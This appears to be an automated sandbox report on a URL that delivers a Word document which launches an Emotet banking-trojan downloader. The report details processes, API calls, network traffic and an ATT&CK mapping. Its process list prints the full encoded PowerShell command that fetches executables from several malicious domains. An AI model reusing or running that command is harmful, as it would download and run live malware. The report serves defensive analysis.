Loading ...

Analysis Report http://leonfurniturestore.com/sec.myacc.resourses.biz/

Overview

General Information

Joe Sandbox Version:25.0.0 Tiger's Eye
Analysis ID:785940
Start date:12.02.2019
Start time:20:11:38
Joe Sandbox Product:Cloud
Overall analysis duration:0h 8m 4s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:browseurl.jbs
Sample URL:http://leonfurniturestore.com/sec.myacc.resourses.biz/
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:10
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal80.bank.expl.evad.win@14/23@3/4
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 53% (good quality ratio 42.2%)
  • Quality average: 58.1%
  • Quality standard deviation: 37.3%
HCA Information:
  • Successful, ratio: 87%
  • Number of executed functions: 87
  • Number of non-executed functions: 189
Cookbook Comments:
  • Adjust boot time
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe

Detection

StrategyScoreRangeReportingWhitelistedDetection
Threshold800 - 100Report FP / FNfalsemalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid Accounts1Command-Line Interface1Valid Accounts1Valid Accounts1Valid Accounts1Credential DumpingProcess Discovery2Application Deployment SoftwareData from Local SystemData Encrypted2Standard Cryptographic Protocol2
Replication Through Removable MediaService Execution1Modify Existing Service1Process Injection1Disabling Security Tools1Network SniffingSecurity Software Discovery2Remote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Non-Application Layer Protocol4
Drive-by CompromisePowerShell4New Service2New Service2Process Injection1Input CaptureRemote System Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Application Layer Protocol4
Exploit Public-Facing ApplicationExploitation for Client Execution11System FirmwareDLL Search Order HijackingDeobfuscate/Decode Files or Information1Credentials in FilesSystem Service Discovery1Logon ScriptsInput CaptureData EncryptedMultiband Communication
Spearphishing LinkCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessObfuscated Files or Information1Account ManipulationFile and Directory Discovery1Shared WebrootData StagedScheduled TransferStandard Cryptographic Protocol
Spearphishing AttachmentGraphical User InterfaceModify Existing ServiceNew ServiceDLL Search Order HijackingBrute ForceSystem Information Discovery22Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used Port

Signature Overview

Click to jump to signature section


Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\Users\user\810.exeCode function: 7_2_00112089 CryptExportKey,7_2_00112089
Source: C:\Users\user\810.exeCode function: 7_2_001120E5 CryptAcquireContextW,7_2_001120E5
Source: C:\Users\user\810.exeCode function: 7_2_00112104 CryptReleaseContext,7_2_00112104
Source: C:\Users\user\810.exeCode function: 7_2_00112125 CryptImportKey,LocalFree,CryptReleaseContext,7_2_00112125
Source: C:\Users\user\810.exeCode function: 7_2_0011218B CryptGenKey,CryptDestroyKey,CryptReleaseContext,7_2_0011218B
Source: C:\Users\user\810.exeCode function: 7_2_001121A9 CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,7_2_001121A9
Source: C:\Users\user\810.exeCode function: 7_2_00112217 GetProcessHeap,RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptEncrypt,CryptDestroyHash,GetProcessHeap,HeapFree,7_2_00112217
Source: C:\Users\user\810.exeCode function: 7_2_00112292 CryptGetHashParam,CryptDestroyHash,GetProcessHeap,HeapFree,7_2_00112292
Source: C:\Users\user\810.exeCode function: 7_2_0011233E RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptDecrypt,CryptDestroyHash,GetProcessHeap,HeapFree,7_2_0011233E
Source: C:\Users\user\810.exeCode function: 7_2_001123B0 CryptVerifySignatureW,CryptDestroyHash,GetProcessHeap,HeapFree,7_2_001123B0
Source: C:\Windows\System32\startedradar.exeCode function: 9_2_001120E5 CryptAcquireContextW,9_2_001120E5
Source: C:\Windows\System32\startedradar.exeCode function: 9_2_00112104 CryptDecodeObjectEx,CryptReleaseContext,9_2_00112104
Source: C:\Windows\System32\startedradar.exeCode function: 9_2_00112089 CryptExportKey,9_2_00112089
Source: C:\Windows\System32\startedradar.exeCode function: 9_2_00112125 CryptImportKey,LocalFree,CryptReleaseContext,9_2_00112125
Source: C:\Windows\System32\startedradar.exeCode function: 9_2_0011218B CryptGenKey,CryptDestroyKey,CryptReleaseContext,9_2_0011218B
Source: C:\Windows\System32\startedradar.exeCode function: 9_2_001121A9 CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,9_2_001121A9
Source: C:\Windows\System32\startedradar.exeCode function: 9_2_00112217 GetProcessHeap,RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptEncrypt,CryptDestroyHash,GetProcessHeap,HeapFree,9_2_00112217
Source: C:\Windows\System32\startedradar.exeCode function: 9_2_00112292 CryptGetHashParam,CryptDestroyHash,GetProcessHeap,HeapFree,9_2_00112292
Source: C:\Windows\System32\startedradar.exeCode function: 9_2_0011233E RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptDecrypt,CryptDestroyHash,GetProcessHeap,HeapFree,9_2_0011233E
Source: C:\Windows\System32\startedradar.exeCode function: 9_2_001123B0 CryptVerifySignatureW,CryptDestroyHash,GetProcessHeap,HeapFree,9_2_001123B0

Spreading:

barindex
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Potential browser exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEJump to behavior

Networking:

barindex
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 184.101.191.86
Source: unknownTCP traffic detected without corresponding DNS query: 184.101.191.86
Source: unknownTCP traffic detected without corresponding DNS query: 184.101.191.86
Source: unknownTCP traffic detected without corresponding DNS query: 184.101.191.86
Source: unknownTCP traffic detected without corresponding DNS query: 184.101.191.86
Source: unknownTCP traffic detected without corresponding DNS query: 184.101.191.86
Source: unknownTCP traffic detected without corresponding DNS query: 181.15.224.57
Source: unknownTCP traffic detected without corresponding DNS query: 181.15.224.57
Source: unknownTCP traffic detected without corresponding DNS query: 181.15.224.57
Source: unknownTCP traffic detected without corresponding DNS query: 181.15.224.57
Source: unknownTCP traffic detected without corresponding DNS query: 181.15.224.57
Source: unknownTCP traffic detected without corresponding DNS query: 181.15.224.57
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /9onrkqJ HTTP/1.1Host: borsacat.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /9onrkqJ/ HTTP/1.1Host: borsacat.com
Contains functionality to download additional files from the internetShow sources
Source: C:\Windows\System32\startedradar.exeCode function: 9_2_00111679 HttpQueryInfoW,GetProcessHeap,RtlAllocateHeap,InternetReadFile,GetProcessHeap,HeapFree,9_2_00111679
Downloads filesShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\LowJump to behavior
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /sec.myacc.resourses.biz/ HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: leonfurniturestore.comDNT: 1Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /9onrkqJ HTTP/1.1Host: borsacat.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /9onrkqJ/ HTTP/1.1Host: borsacat.com
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: 55193=HoTC9DGe9+F8n6zBTTuy+GWHm63lQSxcmAlGva3Kao04L64CnsGpcFMQIpsoIeOaWtHQuDMyxaXSDx1wPhNwdOm3OEfCNoSKj9RgMXnR3WTr+QwWzfnMGmbSg9hdXtbVDOmnf7WTrIDGPrSXQxJgUyScIjhAKBaaJC/11D+B+Y9jm379ECkn78pv6/zOXqZ/1oYa+5OLkVkU0lqyuBaiY2a0PDmNKWybkJPv7DhC/8qnKqUOrKKvCbTJSTXugxvsqoGHX7vUeSuyFaVfDTThr6ToCd9mmlS6Gy1PvZJKfMunlupwXJ6GASeAuCeUy3/pD2ez2xZDOO2P87McYuTRMr1S6bl7OkfQ6fVVO8nAG8pOfMuJI9zARL54B7LfNoaZx5LhOl4RV0Qi/6mrfmVbSz+HX5hnU66i8oLMzRBbcmbJAfpeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 181.15.224.57Connection: Keep-AliveCache-Control: no-cache
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: leonfurniturestore.com
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Feb 2019 19:13:02 GMTServer: ApacheX-Powered-By: PHP/5.6.37Expires: Tue, 01 Jan 1970 00:00:00 GMTCache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0Pragma: no-cacheContent-Disposition: attachment; filename="lmZBvQit.exe"Content-Transfer-Encoding: binaryLast-Modified: Tue, 12 Feb 2019 19:13:02 GMTVary: Accept-Encoding,User-AgentTransfer-Encoding: chunkedContent-Type: application/octet-streamData Raw: 34 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 da 9c a8 14 9e fd c6 47 9e fd c6 47 9e fd c6 47 97 85 55 47 91 fd c6 47 9e fd c7 47 86 fd c6 47 9e fd c6 47 9f fd c6 47 93 af 1d
Urls found in memory or binary dataShow sources
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmpString found in binary or memory: http://borsacat.H
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmpString found in binary or memory: http://borsacat.cH
Source: powershell.exe, 00000004.00000002.1667350886.01F78000.00000004.sdmpString found in binary or memory: http://borsacat.com
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmpString found in binary or memory: http://borsacat.com/9onrH
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmpString found in binary or memory: http://borsacat.com/9onrkqH
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmp, powershell.exe, 00000004.00000002.1665256686.00215000.00000004.sdmpString found in binary or memory: http://borsacat.com/9onrkqJ
Source: powershell.exe, 00000004.00000002.1667350886.01F78000.00000004.sdmpString found in binary or memory: http://borsacat.com/9onrkqJ/H
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmpString found in binary or memory: http://borsacat.com/9onrkqJH
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmpString found in binary or memory: http://borsacat.comh%
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmpString found in binary or memory: http://chileven.com/YAsyH
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmpString found in binary or memory: http://chileven.com/YAsyS0Mslz
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmpString found in binary or memory: http://chileven.com/YAsyS0MslzH
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmpString found in binary or memory: http://chileven.com/YAsySH
Source: 77EC63BDA74BD0D0E0426DC8F8008506.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmpString found in binary or memory: http://fatrecipesdoc.com/I20cH
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmpString found in binary or memory: http://fatrecipesdoc.com/I20clH
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmpString found in binary or memory: http://fatrecipesdoc.com/I20clMx8
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmpString found in binary or memory: http://fatrecipesdoc.com/I20clMx8H
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmpString found in binary or memory: http://huyushop.com/P2ryBfybD
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmpString found in binary or memory: http://huyushop.com/P2ryBfybDH
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmpString found in binary or memory: http://huyushop.comH
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmpString found in binary or memory: http://idjvn.H
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmpString found in binary or memory: http://idjvn.com/eUBrJH
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmpString found in binary or memory: http://idjvn.com/eUBrJig7
Source: powershell.exe, 00000004.00000002.1666755076.01BF8000.00000004.sdmpString found in binary or memory: http://idjvn.com/eUH
Source: sec.myacc.resourses[1].htm.1.drString found in binary or memory: https://www.leonfurniturestore.com/sec.myacc.resourses.biz/
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49225
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49224
Source: unknownNetwork traffic detected: HTTP traffic on port 49224 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49225 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49234 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49235 -> 443

E-Banking Fraud:

barindex
Detected Emotet e-Banking trojanShow sources
Source: C:\Users\user\810.exeCode function: 7_2_0011CF867_2_0011CF86
Source: C:\Windows\System32\startedradar.exeCode function: 9_2_0011CF869_2_0011CF86

Spam, unwanted Advertisements and Ransom Demands:

barindex
Contains functionality to import cryptographic keys (often used in ransomware)Show sources
Source: C:\Users\user\810.exeCode function: 7_2_00112125 CryptImportKey,LocalFree,CryptReleaseContext,7_2_00112125
Source: C:\Windows\System32\startedradar.exeCode function: 9_2_00112125 CryptImportKey,LocalFree,CryptReleaseContext,9_2_00112125

System Summary:

barindex
Powershell connects to networkShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 185.2.4.75 80Jump to behavior
Powershell drops PE fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\810.exeJump to dropped file
Contains functionality to call native functionsShow sources
Source: C:\Users\user\810.exeCode function: 6_2_003E21B8 NtAllocateVirtualMemory,6_2_003E21B8
Source: C:\Users\user\810.exeCode function: 6_2_003E20FD NtProtectVirtualMemory,6_2_003E20FD
Source: C:\Users\user\810.exeCode function: 7_2_000F21B8 NtAllocateVirtualMemory,7_2_000F21B8
Source: C:\Users\user\810.exeCode function: 7_2_000F20FD NtProtectVirtualMemory,7_2_000F20FD
Source: C:\Windows\System32\startedradar.exeCode function: 8_2_002821B8 NtAllocateVirtualMemory,8_2_002821B8
Source: C:\Windows\System32\startedradar.exeCode function: 8_2_002820FD NtProtectVirtualMemory,8_2_002820FD
Source: C:\Windows\System32\startedradar.exeCode function: 9_2_000F21B8 NtAllocateVirtualMemory,9_2_000F21B8
Source: C:\Windows\System32\startedradar.exeCode function: 9_2_000F20FD NtProtectVirtualMemory,9_2_000F20FD
Contains functionality to delete servicesShow sources
Source: C:\Users\user\810.exeCode function: 7_2_0011FD10 _snwprintf,GetProcessHeap,HeapFree,OpenServiceW,DeleteService,CloseServiceHandle,7_2_0011FD10
Contains functionality to launch a process as a different userShow sources
Source: C:\Users\user\810.exeCode function: 7_2_00111F72 CreateProcessAsUserW,7_2_00111F72
Creates mutexesShow sources
Source: C:\Windows\System32\startedradar.exeMutant created: \BaseNamedObjects\Global\I3C4E0000
Source: C:\Windows\System32\startedradar.exeMutant created: \BaseNamedObjects\PEMEC8
Source: C:\Users\user\810.exeMutant created: \Sessions\2\BaseNamedObjects\PEMD40
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\2\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\startedradar.exeMutant created: \BaseNamedObjects\PEM198
Source: C:\Users\user\810.exeMutant created: \Sessions\2\BaseNamedObjects\PEM5E8
Source: C:\Users\user\810.exeMutant created: \Sessions\2\BaseNamedObjects\Global\M3C4E0000
Source: C:\Users\user\810.exeMutant created: \Sessions\2\BaseNamedObjects\Global\I3C4E0000
Detected potential crypto functionShow sources
Source: C:\Users\user\810.exeCode function: 6_2_00D035356_2_00D03535
Source: C:\Users\user\810.exeCode function: 6_2_004053DF6_2_004053DF
Source: C:\Users\user\810.exeCode function: 6_2_004053DF6_2_004053DF
Source: C:\Users\user\810.exeCode function: 6_1_00D035356_1_00D03535
Source: C:\Users\user\810.exeCode function: 7_2_001153DF7_2_001153DF
Source: C:\Users\user\810.exeCode function: 7_2_001153DF7_2_001153DF
Source: C:\Windows\System32\startedradar.exeCode function: 8_2_002A53DF8_2_002A53DF
Source: C:\Windows\System32\startedradar.exeCode function: 8_2_002A53DF8_2_002A53DF
Source: C:\Windows\System32\startedradar.exeCode function: 9_2_001153DF9_2_001153DF
Source: C:\Windows\System32\startedradar.exeCode function: 9_2_001153DF9_2_001153DF
Reads the hosts fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\startedradar.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\startedradar.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Classification labelShow sources
Source: classification engineClassification label: mal80.bank.expl.evad.win@14/23@3/4
Contains functionality to create servicesShow sources
Source: C:\Users\user\810.exeCode function: _snwprintf,GetProcessHeap,HeapFree,CreateServiceW,CloseServiceHandle,7_2_0011FDC9
Source: C:\Windows\System32\startedradar.exeCode function: _snwprintf,GetProcessHeap,HeapFree,CreateServiceW,CloseServiceHandle,9_2_0011FDC9
Contains functionality to enum processes or threadsShow sources
Source: C:\Users\user\810.exeCode function: 6_2_00401BF0 CreateToolhelp32Snapshot,6_2_00401BF0
Contains functionality to modify services (start/stop/modify)Show sources
Source: C:\Users\user\810.exeCode function: 7_2_0011FE54 ChangeServiceConfig2W,GetProcessHeap,HeapFree,7_2_0011FE54
Creates files inside the user directoryShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\History\LowJump to behavior
Creates temporary filesShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeFile created: C:\Users\user~1\AppData\Local\Temp\~DFEA1CECCC785180E5.TMPJump to behavior
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Reads ini filesShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2320 CREDAT:275457 /prefetch:2
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMAB00G0\eFILE_201902123164.doc
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwershell -e JABXADkAaQAyAG4ASQA9ACgAJwBKAGwASQAnACsAJwBSAEIAJwArACcASgBIACcAKQA7ACQASQBBADkANQBZADgAOAAxAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFYAUABpAFoAVQBUAFgAPQAoACcAaAB0AHQAcAA6AC8ALwAnACsAJwBiACcAKwAnAG8AcgBzAGEAJwArACcAYwBhAHQAJwArACcALgAnACsAJwBjACcAKwAnAG8AbQAvADkAbwBuAHIAJwArACcAawBxACcAKwAnAEoAQABoAHQAdABwACcAKwAnADoALwAnACsAJwAvAGMAaABpAGwAZQB2AGUAJwArACcAbgAnACsAJwAuAGMAbwBtAC8AWQBBAHMAeQAnACsAJwBTACcAKwAnADAATQBzAGwAegAnACsAJwBAAGgAdAAnACsAJwB0AHAAOgAnACsAJwAvAC8AaAB1ACcAKwAnAHkAJwArACcAdQAnACsAJwBzACcAKwAnAGgAbwAnACsAJwBwACcAKwAnAC4AYwBvAG0AJwArACcALwBQADIAcgB5AEIAZgB5AGIARABAAGgAJwArACcAdAB0AHAAOgAvACcAKwAnAC8AZgBhAHQAJwArACcAcgBlACcAKwAnAGMAaQBwACcAKwAnAGUAcwBkAG8AYwAnACsAJwAuAGMAbwBtAC8ASQAyADAAYwAnACsAJwBsACcAKwAnAE0AeAA4AEAAaAB0ACcAKwAnAHQAcAA6AC8ALwBpAGQAJwArACcAagB2AG4AJwArACcALgAnACsAJwBjAG8AbQAvAGUAVQAnACsAJwBCAHIASgAnACsAJwBpAGcANwAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABZAEYANABoADQATgA9ACgAJ
Source: unknownProcess created: C:\Users\user\810.exe 'C:\Users\user\810.exe'
Source: unknownProcess created: C:\Users\user\810.exe C:\Users\user\810.exe
Source: unknownProcess created: C:\Windows\System32\startedradar.exe C:\Windows\system32\startedradar.exe
Source: unknownProcess created: C:\Windows\System32\startedradar.exe C:\Windows\system32\startedradar.exe
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:2320 CREDAT:275457 /prefetch:2Jump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PMAB00G0\eFILE_201902123164.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwershell -e JABXADkAaQAyAG4ASQA9ACgAJwBKAGwASQAnACsAJwBSAEIAJwArACcASgBIACcAKQA7ACQASQBBADkANQBZADgAOAAxAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFYAUABpAFoAVQBUAFgAPQAoACcAaAB0AHQAcAA6AC8ALwAnACsAJwBiACcAKwAnAG8AcgBzAGEAJwArACcAYwBhAHQAJwArACcALgAnACsAJwBjACcAKwAnAG8AbQAvADkAbwBuAHIAJwArACcAawBxACcAKwAnAEoAQABoAHQAdABwACcAKwAnADoALwAnACsAJwAvAGMAaABpAGwAZQB2AGUAJwArACcAbgAnACsAJwAuAGMAbwBtAC8AWQBBAHMAeQAnACsAJwBTACcAKwAnADAATQBzAGwAegAnACsAJwBAAGgAdAAnACsAJwB0AHAAOgAnACsAJwAvAC8AaAB1ACcAKwAnAHkAJwArACcAdQAnACsAJwBzACcAKwAnAGgAbwAnACsAJwBwACcAKwAnAC4AYwBvAG0AJwArACcALwBQADIAcgB5AEIAZgB5AGIARABAAGgAJwArACcAdAB0AHAAOgAvACcAKwAnAC8AZgBhAHQAJwArACcAcgBlACcAKwAnAGMAaQBwACcAKwAnAGUAcwBkAG8AYwAnACsAJwAuAGMAbwBtAC8ASQAyADAAYwAnACsAJwBsACcAKwAnAE0AeAA4AEAAaAB0ACcAKwAnAHQAcAA6AC8ALwBpAGQAJwArACcAagB2AG4AJwArACcALgAnACsAJwBjAG8AbQAvAGUAVQAnACsAJwBCAHIASgAnACsAJwBpAGcANwAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABZAEYANABoADQATgA9ACgAJJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\810.exe 'C:\Users\user\810.exe' Jump to behavior
Source: C:\Users\user\810.exeProcess created: C:\Users\user\810.exe C:\Users\user\810.exeJump to behavior
Source: C:\Windows\System32\startedradar.exeProcess created: C:\Windows\System32\startedradar.exe C:\Windows\system32\startedradar.exeJump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32Jump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: l5gXiD5DD2Qlu5.pdb source: 810.exe.4.dr
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.1668557236.03EB0000.00000002.sdmp

Data Obfuscation:

barindex
PowerShell case anomaly foundShow sources
